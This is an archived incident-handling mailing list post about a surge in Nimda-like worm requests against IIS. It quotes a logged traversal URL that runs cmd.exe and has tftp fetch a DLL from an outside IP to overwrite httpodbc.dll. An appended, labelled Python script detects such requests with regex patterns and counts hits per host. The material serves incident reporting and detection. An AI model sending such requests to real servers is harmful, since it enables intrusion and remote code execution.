I am also seeing an upsurge in Nimda-like exploit requests. This is just one example.

http://www.myserver.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2065.197.180.98%20GET%20cool.dll%20c:\httpodbc.dll

User's IP: 65.197.180.98

New DLLs are showing up in these requests, although the methods of execution remain the same. Perhaps someone has thrashed another core IIS/Win32 dll and is attempting to exploit? Pretty sure httpodbc.dll is in use by IIS and my ODBC connections. (Correct me if I'm wrong ... ;))

Another thing I've noticed is the number of requests per IP has gone up. Usually I'd get about 20 - 30 requests, now I'm receiving anywhere between 50 and 80 from the infected host. It does still appear to be automated / worm activity.

Just thought I'd let the lists know. ;-)

Joshua Hiller
Manager Web Operations
AeA
Advancing the Business of Technology

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
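Added example, not part of the original post: a small log triage script that flags requests shaped like the one quoted above, records which files the tftp command tries to fetch and where it writes them, and counts requests per client so the 50 to 80 per-host volume stands out. The log layout, the sample lines (documentation IP ranges) and the function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in a simplified "client-ip method uri status" layout
# (an assumption; map the fields from your own IIS log format).
SAMPLE_LOG = [
    r"192.0.2.10 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.10%20GET%20cool.dll%20c:\httpodbc.dll 404",
    r"192.0.2.10 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 404",
    r"192.0.2.10 GET /SCRIPTS/..%C1%9C../WINNT/SYSTEM32/CMD.EXE?/c+dir 404",
    "198.51.100.7 GET /index.html 200",
    "198.51.100.7 GET /scripts/report.asp?id=4 200",
]

# 0xC0 and 0xC1 can never start a valid UTF-8 sequence, so a percent-encoded
# one in a URL path is an overlong encoding, as in the "..%c1%9c.." above.
OVERLONG = re.compile(r"%c[01]%[89ab][0-9a-f]", re.I)
TFTP_GET = re.compile(r"tftp\s+-i\s+(\S+)\s+get\s+(\S+)\s+(\S+)", re.I)

def analyze(lines):
    """Return {client_ip: {"hits": int, "transfers": set}} for suspicious requests."""
    report = defaultdict(lambda: {"hits": 0, "transfers": set()})
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue  # skip lines that do not match the assumed layout
        ip, _method, uri, _status = parts
        path, _, query = uri.partition("?")
        if not (OVERLONG.search(path) or "cmd.exe" in path.lower()):
            continue
        entry = report[ip]
        entry["hits"] += 1
        match = TFTP_GET.search(unquote_plus(query))
        if match:
            # (tftp server, file fetched, local destination): a new tuple here
            # means a DLL name that has not been seen in earlier requests.
            entry["transfers"].add(match.groups())
    return dict(report)

def noisy_hosts(report, threshold=50):
    """Clients at or above the per-host request count reported in the post."""
    return sorted(ip for ip, e in report.items() if e["hits"] >= threshold)

if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, entry["hits"], sorted(entry["transfers"]))
```

Diffing the `transfers` set between runs shows when a new DLL name or overwrite target appears even though the request pattern itself has not changed.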
This archive was generated by hypermail 2b30 : Wed Feb 27 2002 - 15:32:26 PST